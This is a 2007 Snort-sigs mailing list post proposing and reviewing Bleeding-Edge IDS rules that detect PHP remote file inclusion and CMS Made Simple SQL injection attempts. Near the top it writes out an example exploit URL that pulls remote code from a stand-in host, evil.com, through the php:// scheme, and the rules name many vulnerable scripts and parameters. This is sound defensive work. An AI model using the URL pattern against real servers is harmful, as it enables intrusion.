



Network Security Snort-Signatures

[Snort-sigs] PHP remote include sigs (part II)

Subject: [Snort-sigs] PHP remote include sigs (part II)
Date: Wed, 30 May 2007 11:04:45 +0100
Hi there,

[part II - bleeding rules this time]

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui", which only covers the http, https and
ftp schemes.

It turns out that PHP also ships with the following URL schemes
enabled by default:
php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

i.e. an exploit URL would look something like:
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome:

cheers,
 Jamie

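# Aardvark Topsites PHP (CVE-2006-2149): remote file inclusion via the
# CONFIG[PATH] parameter of join.php or lostpw.php.
# Change from the posted rule: the parameter pcre accepted only
# "&CONFIG[path]=", so a request carrying CONFIG[PATH] as the first
# parameter ("?CONFIG[PATH]=") was not matched. It now accepts '?' or '&'
# before the name and optional whitespace before the scheme, like the other
# rules in this set.
# The msg string is back on one line (the mail wrap had split it) and the
# rule uses backslash continuations. rev is left as posted; bump it when
# the change is committed.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB PHP Aardvark Topsites PHP CONFIG[PATH] Remote File Include Attempt"; \
    flow:established,to_server; \
    uricontent:"CONFIG[PATH]="; nocase; \
    pcre:"/(join|lostpw)\.php\?/Ui"; \
    pcre:"/[?&]CONFIG\x5bpath\x5d=\s*(php|ftps?|https?)\:/Ui"; \
    reference:cve,CVE-2006-2149; reference:url,www.osvdb.org/25158; \
    classtype:web-application-attack; sid:2002901; rev:2;)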
# CGX (CVE-2007-2611, parameter pathCGX) and CJG Explorer (CVE-2007-2660,
# parameter g_pcltar_lib_dir): remote file inclusion attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it. Anchoring it to the
# parameter name (as the root_path= and include_path= rules in this set do)
# would reduce false positives -- confirm before changing.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- mtdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/mtdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(php|https?|ftps?)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003726; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- ltdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/ltdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003727; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- login.php
pathCGX"; flow:established,to_server; uricontent:"/login.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003729; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- logingecon.php
pathCGX"; flow:established,to_server;
uricontent:"/inc/logingecon.php?"; nocase; uricontent:"pathCGX=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003728; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CJG Explorer Remote Inclusion Attempt --
pcltrace.lib.php g_pcltar_lib_dir"; flow:established,to_server;
uricontent:"/pcltrace.lib.php?"; nocase;
uricontent:"g_pcltar_lib_dir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2660;
reference:url,www.milw0rm.com/exploits/3915; sid:2003737; rev:3;)
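# CMS Made Simple (CVE-2007-2473): SQL injection attempts against the
# templateid parameter of stylesheet.php, one rule per SQL keyword pair.
#
# Change from the posted rules: all six carried the remote-file-include
# pcre "/=\s*(https?|ftps?|php)\:\//Ui". That pattern requires a URL scheme
# after an '=', which an SQL injection request has no reason to contain, so
# the rules would not fire on the traffic their msg describes. Each pcre now
# checks that the two keywords already required by uricontent appear in
# statement order. These patterns are constructed for this review; compare
# them with the upstream bleeding-edge rule before deploying.
#
# msg strings are back on one line (the mail wrap had split them) and the
# rules use backslash continuations. sid and rev are left as posted; bump
# rev when the change is committed.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid SELECT"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"SELECT"; nocase; uricontent:"FROM"; nocase; \
    pcre:"/SELECT.+FROM/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003794; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UNION SELECT"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; \
    pcre:"/UNION.+SELECT/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003795; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid INSERT"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"INSERT"; nocase; uricontent:"INTO"; nocase; \
    pcre:"/INSERT.+INTO/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003796; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid DELETE"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"DELETE"; nocase; uricontent:"FROM"; nocase; \
    pcre:"/DELETE.+FROM/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003865; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid ASCII"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"ASCII("; nocase; uricontent:"SELECT"; nocase; \
    pcre:"/ASCII\(.+SELECT/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003797; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt -- stylesheet.php templateid UPDATE"; \
    flow:established,to_server; \
    uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid="; nocase; \
    uricontent:"UPDATE"; nocase; uricontent:"SET"; nocase; \
    pcre:"/UPDATE.+SET/Ui"; \
    classtype:web-application-attack; reference:cve,CVE-2007-2473; \
    reference:url,www.securityfocus.com/bid/23753; sid:2003798; rev:3;)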
# Cacti: URL-valued parameter passed to config_settings.php or
# top_graph_header.php. The pcre accepts any parameter ('.*=') followed by an
# http(s), ftp(s) or php scheme.
# content:"GET"; depth:3 limits the rule to payloads that begin with GET, so
# other request methods are not inspected by this rule.
# classtype is web-application-activity here, unlike the
# web-application-attack used by the other rules in this set.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE Cacti Input Validation Attack";
flow:established,to_server; content:"GET"; depth:3; nocase;
pcre:"/(config_settings|top_graph_header)\.php\?.*=(https?|ftps?|php)\:\//Ui";
classtype:web-application-activity; reference:url,www.cacti.net;
reference:url,www.idefense.com/application/poi/display?id=265&type=vulnerabilities;
reference:url,www.idefense.com/application/poi/display?id=266&type=vulnerabilities;
sid:2002129; rev:6;)
# DynamicPAD (CVE-2007-2527, HomeDir), E-Gads (CVE-2007-2521, locale) and
# Firefly (CVE-2007-2460, DOCUMENT_ROOT): remote file inclusion attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it. The generic paths
# "/index.php?" and "/common.php?" make that more likely to cause false
# positives here -- consider anchoring the pcre to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
dp_logs.php HomeDir"; flow:established,to_server;
uricontent:"/dp_logs.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003679; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
index.php HomeDir"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003680; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB E-Gads Remote Inclusion Attempt -- common.php
locale"; flow:established,to_server; uricontent:"/common.php?";
nocase; uricontent:"locale="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2521;
reference:url,www.milw0rm.com/exploits/3846; sid:2003682; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Firefly Remote Inclusion Attempt -- config.php
DOCUMENT_ROOT"; flow:established,to_server;
uricontent:"/modules/admin/include/config.php?"; nocase;
uricontent:"DOCUMENT_ROOT="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2460;
reference:url,www.frsirt.com/english/advisories/2007/1554;
sid:2003690; rev:3;)
# Gnopaster (bugtraq 18180): remote file inclusion via root_path.
# The pcre is anchored to "root_path=", so only a URL scheme in that
# parameter matches. The uricontent path has no trailing '?'.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include";
flow:established,to_server; uricontent:"/includes/common.php"; nocase;
pcre:"/root_path=\s*(ftps?|https?|php)\:\//Ui";
reference:bugtraq,18180; classtype:web-application-attack;
sid:2003333; rev:2;)
# LaVague (CVE-2007-2607): remote file inclusion via views_path.
# NOTE(review): unlike the rule above, the pcre here is not tied to the
# parameter name; a URL in any parameter of a printbar.php request that
# also contains "views_path=" satisfies it.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB LaVague Remote Inclusion Attempt --
printbar.php views_path"; flow:established,to_server;
uricontent:"/views/print/printbar.php?"; nocase;
uricontent:"views_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2607;
reference:url,www.milw0rm.com/exploits/3870; sid:2003716; rev:3;)
# membreManager.php (bugtraq 22287): remote file inclusion via include_path.
# The pcre is anchored to "include_path=".
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file
include"; flow:established,to_server;
uricontent:"/membres/membreManager.php"; nocase;
pcre:"/include_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22287; classtype:web-application-attack;
sid:2003331; rev:2;)
# miplex2 (CVE-2007-2608), Open Translation Engine (CVE-2007-2676) and
# PHPChess (CVE-2007-2677): remote file inclusion attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# The miplex2 rule matches the array parameter by its prefix "system[" only.
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it -- consider
# anchoring it to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB miplex2 Remote Inclusion SmartyFU.class.php
system"; flow:established,to_server;
uricontent:"/lib/smarty/SmartyFU.class.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2608;
reference:url,www.milw0rm.com/exploits/3878; sid:2003717; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Open Translation Engine Remote Inclusion
Attempt -- header.php ote_home"; flow:established,to_server;
uricontent:"/skins/header.php?"; nocase; uricontent:"ote_home=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2676;
reference:url,www.milw0rm.com/exploits/3838; sid:2003741; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
language.php config"; flow:established,to_server;
uricontent:"/includes/language.php?"; nocase; uricontent:"config=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003742; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_admin_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_admin_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003743; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003744; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_t_top.php Root_Path"; flow:established,to_server;
uricontent:"/skins/phpchess/layout_t_top.php?"; nocase;
uricontent:"Root_Path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003745; rev:3;)
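# PHPEventMan (bugtraq 22358): remote file inclusion via the level parameter
# of text.ctrl.php or common.function.php under /controller/.
# Change from the posted rule: the pcre required "level=" to follow the '?'
# directly, so a request carrying level as a later parameter was not
# matched. The optional group "(.*&)?" now allows other parameters before it.
# The rule uses backslash continuations instead of the mail-wrapped lines.
# rev is left as posted; bump it when the change is committed.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
    (msg:"BLEEDING-EDGE WEB PHPEventMan remote file include"; \
    flow:established,to_server; uricontent:"/controller/"; nocase; \
    pcre:"/(text\.ctrl\.php|common\.function\.php)\?(.*&)?level=\s*(ftps?|php|https?)\:\//Ui"; \
    reference:bugtraq,22358; classtype:web-application-attack; \
    sid:2003372; rev:2;)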
# PHPFirstPost (CVE-2007-2665), PHPHtmlLib (CVE-2007-2614), PHPLojaFacil
# (CVE-2007-2615), phpMyPortal (CVE-2007-2594) and PHPSecurityAdmin
# (CVE-2007-2628): remote file inclusion attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it -- consider
# anchoring it to the parameter name.
# NOTE(review): "/ftp.php?" is a substring of "/libs/ftp.php?", so a request
# for the latter appears to satisfy both sid:2003731 and sid:2003733 --
# confirm whether the double alert is wanted.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPFirstPost Remote Inclusion Attempt
block.php Include"; flow:established,to_server;
uricontent:"/block.php?"; nocase; uricontent:"Include="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2665;
reference:url,www.milw0rm.com/exploits/3906; sid:2003740; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPHtmlLib Remote Inclusion Attempt --
widget8.php phphtmllib"; flow:established,to_server;
uricontent:"/examples/widget8.php?"; nocase; uricontent:"phphtmllib=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2614;
reference:url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded;
sid:2003730; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
ftp.php path_local"; flow:established,to_server;
uricontent:"/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003731; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
db.php path_local"; flow:established,to_server;
uricontent:"/libs/db.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003732; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
libs_ftp.php path_local"; flow:established,to_server;
uricontent:"/libs/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003733; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB phpMyPortal Remote Inclusion Attempt --
articles.inc.php GLOBALS[CHEMINMODULES]"; flow:established,to_server;
uricontent:"/inc/articles.inc.php?"; nocase;
uricontent:"GLOBALS[CHEMINMODULES]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2594;
reference:url,www.milw0rm.com/exploits/3879; sid:2003703; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPSecurityAdmin Remote Inclusion Attempt --
logout.php PSA_PATH"; flow:established,to_server;
uricontent:"/include/logout.php?"; nocase; uricontent:"PSA_PATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2628;
reference:url,www.securityfocus.com/bid/23801; sid:2003735; rev:3;)
# Generic PHP remote-include check: payload starts with GET, ".php?" is in
# the URI, a URL scheme follows an '=' directly (no \s* here, unlike most
# rules in this set), and "cmd=" is present in the payload.
# NOTE(review): the nocase that follows the pcre has no content option of
# its own to modify (the pcre is already /i) -- looks redundant, confirm.
# NOTE(review): within:100 is relative to the previous content match, which
# appears to be "GET"; a long path would put "cmd=" out of that range --
# confirm the bound is intended.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:
"BLEEDING-EDGE EXPLOIT WEB PHP remote file include exploit attempt";
flow: to_server,established; content:"GET"; nocase; depth:3;
uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui";
nocase; content:"cmd="; nocase; within: 100; classtype:
attempted-admin; sid: 2001810; rev:10; )
# PHPNuke iframe.php: the pcre is anchored to "file=", so only a URL scheme
# in that parameter matches.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (
msg:"BLEEDING-EDGE WEB PHP PHPNuke Remote File Inclusion Attempt";
flow:established,to_server; uricontent:"/iframe.php"; nocase;
uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.zone-h.org/en/advisories/read/id=8694/;
classtype:web-application-attack; sid:2002800; rev:3; )
# Turbulence (CVE-2007-2504): remote file inclusion via GLOBALS[tcore].
# NOTE(review): the pcre is not tied to the parameter name; a URL in any
# parameter of a matching request satisfies it.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Turbulence Remote Inclusion Attempt --
turbulence.php GLOBALS[tcore]"; flow:established,to_server;
uricontent:"/user/turbulence.php?"; nocase;
uricontent:"GLOBALS[tcore]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2504;
reference:url,www.securityfocus.com/bid/23580; sid:2003683; rev:3;)
# Web Calendar send_reminders.php: the pcre is anchored to "includedir=".
# The cve reference is written without the "CVE-" prefix, unlike the 2007
# rules in this set.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Web Calendar Remote File Inclusion
Attempt"; flow:established,to_server;
uricontent:"/send_reminders.php"; nocase;
pcre:"/includedir=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,14651; reference:cve,2005-2717;
classtype:web-application-attack; sid:2002898; rev:4;)
# PHPtree (CVE-2007-2573, s_dir) and PMECMS (CVE-2007-2540,
# config[pathMod] in five mod/*/index.php scripts): remote file inclusion
# attempts.
# Each rule requires the script path and the parameter name in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the named parameter, so a URL in any
# other parameter of the same request also satisfies it -- consider
# anchoring it to the parameter name.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPtree Remote Inclusion Attempt -- cms2.php
s_dir"; flow:established,to_server;
uricontent:"/plugin/HP_DEV/cms2.php?"; nocase; uricontent:"s_dir=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2573;
reference:url,www.milw0rm.com/exploits/3860; sid:2003693; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_image_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/image/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003672; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liens_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liens/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003673; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liste_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liste/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003674; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_special_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/special/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003675; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_texte_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/texte/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003676; rev:3;)
# Persism CMS (CVE-2007-2545): remote file inclusion attempts against ten
# scripts that take a system[...] array parameter.
# Each rule requires the script path and the prefix "system[" in the URI
# (uricontent, case-insensitive) plus a URL scheme -- http(s), ftp(s) or
# php -- right after an '=' (pcre; /U matches the URI buffer, /i ignores case).
# NOTE(review): the pcre is not tied to the system[...] parameter, so a URL
# in any other parameter of the same request also satisfies it -- consider
# anchoring it, e.g. on "system\x5b[^=]*=".
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt -
Headerfile.php System"; flow:established,to_server;
uricontent:"/blocks/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003660; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_files.php System"; flow:established,to_server;
uricontent:"/files/blocks/latest_files.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003661; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_posts.php System"; flow:established,to_server;
uricontent:"/forums/blocks/latest_posts.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003662; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
groups_headerfile.php System"; flow:established,to_server;
uricontent:"/groups/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003663; rev:3;)
